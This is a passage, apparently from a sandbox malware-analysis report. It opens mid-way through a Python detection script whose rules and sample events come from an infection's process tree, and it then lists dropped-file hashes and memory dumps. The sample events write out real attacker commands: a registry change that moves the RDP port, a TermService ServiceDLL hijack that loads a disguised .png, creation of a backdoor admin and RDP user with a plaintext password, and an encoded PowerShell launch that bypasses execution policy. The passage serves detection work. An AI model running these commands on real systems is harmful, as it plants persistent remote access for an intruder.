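     r"powershell.*?-enc(?:odedcommand)?\s+(?P<b64>[A-Za-z0-9+/=]+)", _cradle_detail),
]

# Records are (image, command line). First seven copied from the process tree,
# last two constructed benign controls (a service start; the genuine ServiceDLL).
SAMPLE_EVENTS: List[Tuple[str, str]] = [
    (r"C:\Windows\system32\reg.exe",
     r'"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f'),
    (r"C:\Windows\system32\reg.exe",
     r'"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f'),
    (r"C:\Windows\system32\reg.exe",
     r'"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f'),
    (r"C:\Windows\system32\net.exe",
     r'"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add'),
    (r"C:\Windows\system32\net.exe", r"net.exe user updwin qVojyFfh /add"),
    (r"C:\Windows\system32\net.exe", r'net.exe LOCALGROUP "Remote Desktop Users" updwin /ADD'),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc " + ENC_PAYLOAD),
    (r"C:\Windows\system32\net.exe", r"net start spooler"),
    (r"C:\Windows\system32\reg.exe",
     r'reg add HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters /v ServiceDLL /t REG_EXPAND_SZ /d %SystemRoot%\System32\termsrv.dll /f'),
]


def analyze(events: List[Tuple[str, str]]) -> List[Finding]:
    """Apply every rule to every record and collect the findings that fire."""
    findings = []
    for image, cmdline in events:
        for name, pattern, describe in RULES:
            m = re.search(pattern, cmdline, re.I)
            detail = describe(m) if m else None
            if detail is not None:
                findings.append(Finding(name, image, detail))
    return findings
```

Run analyze(SAMPLE_EVENTS) and every one of the seven rules fires once, with the decoded cradle URL in the last finding; the two control records produce nothing, which is the point of letting the ServiceDLL rule compare against the real termsrv.dll path rather than alerting on any write to that key.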
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads

C:\Users\Admin\AppData\Local\Temp\RESAE08.tmp
  MD5    539ef5fde4c4c647255c7b9fbe1dc409
  SHA1   46edce61a8161ec08fcc62ac9b99e6df253671da
  SHA256 6edd9fe30a59bdb8254775951215b91b776ee8bed657d8c5e65bc5a3badeb7f9
  SHA512 fa3c605042a19eb8160528c57da9cc2894acc967cd3ebd796fecd9f698e329dc6a825497b005bb82d6a0716959216ef238c014f86f385963dff28146c19df65e

C:\Users\Admin\AppData\Local\Temp\get-points.ps1
  MD5    dac6b25db50155c0c78d5bf64fb95fa3
  SHA1   9e49c8f7a6df94acdefd0daa4c330f92f6d01d0d
  SHA256 6967c2ea21792d390309dfd66d56b19f89d89ba4a6fb8f39f10a8212d5e70eaf
  SHA512 679b3706f2c03898afb4250b1f51d5e0e7187ed923f7d7cc3a06c5f9a1e5b18bbbc46e9c2c9abd0b4b42e5e3a5b2dd668e3057063562b874119c42e855292868

C:\Users\Admin\AppData\Local\Temp\get-points.zip
  MD5    7cac19b2868c41555db4b71219217f9b
  SHA1   d6f77db578db3c5c572c3a944d9072ed00560dcb
  SHA256 d8f648e2952466c25343b095ed14591b25b29d0d1c391ca019a8d8f0a39b934a
  SHA512 5bafea5eed1ba0493188bb79eafda47a141281fb3258be0dfe08b6b78e5dcf731fd2142b94f95b3203fa6daad27fff1f4495ac7bdebe6eb8a9cbe31b16bfc7b6

C:\Users\Admin\AppData\Local\Temp\x4qns4nh\x4qns4nh.dll
  MD5    9f8ecbc9c0c19bac7409ae7a459044b9
  SHA1   709c07554173c190e171e38f14c2301a062f671b
  SHA256 57846d837809a7715d768e9a4773f3f1091a2161eebc0ad03942e6acf11f8458
  SHA512 ed7fa162c0362c2204a0ec91bb02e7d84fb338ad5575071e77c7bdb72fc9ec9f46eb783730add2844182eb87078fc13d4758be667d364b5bd74413acfb733a35

\??\c:\Users\Admin\AppData\Local\Temp\x4qns4nh\CSC2BC06D68D97C49B4A01877BFEAB6C4F7.TMP
  MD5    c1f621e1f90285325043e2a08de8a2da
  SHA1   ed4c2b3a0957212666fdb6b641f3e5d572ccaf03
  SHA256 522e86fe0f5c8684aa4d1c47d957264c827da7d0f810c96652ec7dca1421c373
  SHA512 e9981f35ee164f62883bb8baccb6e2cf6d9ef4c1cbab087b1f98c69e6211b8781de595bad50efc4760ef565c2b5d7935b74425fc455aad70d108549a761e5b76

\??\c:\Users\Admin\AppData\Local\Temp\x4qns4nh\x4qns4nh.0.cs
  MD5    6f235215132cdebacd0f793fe970d0e3
  SHA1   2841e44c387ed3b6f293611992f1508fe9b55b89
  SHA256 ccad602538354ee5bbc78ab935207c36ba9910da1a7b5a10ff455e34e15f15ec
  SHA512 a14657bc5be862a96c1826347b551e07b47ffa6ffd7e12fbfc3437b9a48e8b8e020ae71b8ef836c357d9db6c065da962a6141272d9bc58b76a9eb9c11553d44e

\??\c:\Users\Admin\AppData\Local\Temp\x4qns4nh\x4qns4nh.cmdline
  MD5    9167131ccc835661d4aaaa34ad57d2c2
  SHA1   ba95628e502694990fb96ce5f461cb29efb8f869
  SHA256 14a7c285231e444d9f0ee2d46670c90a27e12070ac332f1ab090a001b4442264
  SHA512 9bef6fa843504a37f5d9993b824ef723129154f446b41c12891f948d9531a91cbc9b2f5a0a5caa975ef16ee6323ee56258571f07ccfa2b9d67dcc90aac46eb64

\Windows\Branding\mediasrv.png
  MD5    eeb448ea2709c57b9ea2e223d0c79396
  SHA1   38331dd027386151ee37a29a7820570a76427b02
  SHA256 c82a8ca8997348bc1631637799d8c88e33df3b64d23fdb006a1afdb5e0170272
  SHA512 c133096ce90e5693669c056a31870b982b162196508babae4d1d9eb4055f2096af9460164d68885693af56389a42977f4193906da1d19f457e26187a46a5e3fc

\Windows\Branding\mediasvc.png
  MD5    bb873bd05a47f502ee4ed3c4ea749a4f
  SHA1   e55a6bf49a4833fb9e9b123df39dac9bf507f75a
  SHA256 a6a28143f81b007c6853cc80829c16d2aadbe427abe1408276b558f34904900a
  SHA512 ce2a22e5e78d3f01a6880a48153f6d3ba8ff025d7bbfe8949b7742a5b7ffa9e44484027353bb80b70e8cad8181dc26b6aabe637b5f7fd2aa4a99cd880d758548
Memory dumps (memory/<pid>-<index>-<range>):
  memory/68-31-0x0000000000000000-mapping.dmp
  memory/188-15-0x0000000000000000-mapping.dmp
  memory/360-27-0x0000000000000000-mapping.dmp
  memory/580-42-0x0000000000000000-mapping.dmp
  memory/744-23-0x0000000000000000-mapping.dmp
  memory/744-7-0x0000000000000000-mapping.dmp
  memory/1260-48-0x0000000000000000-mapping.dmp
  memory/1260-49-0x00007FFB56540000-0x00007FFB56F2C000-memory.dmp (Filesize 9.9MB)
  memory/1264-36-0x0000000000000000-mapping.dmp
  memory/1400-1-0x0000000001890000-0x0000000001891000-memory.dmp (Filesize 4KB)
  memory/1404-41-0x0000000000000000-mapping.dmp
  memory/1908-25-0x0000000000000000-mapping.dmp
  memory/2144-24-0x0000000000000000-mapping.dmp
  memory/2168-35-0x0000000000000000-mapping.dmp
  memory/2212-44-0x0000000000000000-mapping.dmp
  memory/2228-10-0x0000000000000000-mapping.dmp
  memory/2228-22-0x0000000000000000-mapping.dmp
  memory/2260-20-0x0000000000000000-mapping.dmp
  memory/2432-39-0x0000000000000000-mapping.dmp
  memory/2660-46-0x0000000000000000-mapping.dmp
  memory/2668-32-0x0000000000000000-mapping.dmp
  memory/2692-38-0x0000000000000000-mapping.dmp
  memory/2756-21-0x0000000000000000-mapping.dmp
  memory/2792-26-0x0000000000000000-mapping.dmp
  memory/2932-19-0x0000000000000000-mapping.dmp
  memory/2944-47-0x0000000000000000-mapping.dmp
  memory/3264-33-0x0000000000000000-mapping.dmp
  memory/3264-40-0x0000000000000000-mapping.dmp
  memory/3384-34-0x0000000000000000-mapping.dmp
  memory/3384-18-0x0000000000000000-mapping.dmp
  memory/3456-17-0x0000000000000000-mapping.dmp
  memory/3852-30-0x0000000000000000-mapping.dmp
  memory/3892-5-0x0000023EDD750000-0x0000023EDD751000-memory.dmp (Filesize 4KB)
  memory/3892-14-0x0000023EDD6E0000-0x0000023EDD6E1000-memory.dmp (Filesize 4KB)
  memory/3892-4-0x0000023EDD550000-0x0000023EDD551000-memory.dmp (Filesize 4KB)
  memory/3892-3-0x00007FFB56540000-0x00007FFB56F2C000-memory.dmp (Filesize 9.9MB)
  memory/3892-2-0x0000000000000000-mapping.dmp
  memory/3932-16-0x0000000000000000-mapping.dmp
  memory/3932-45-0x0000000000000000-mapping.dmp
  memory/3996-37-0x0000000000000000-mapping.dmp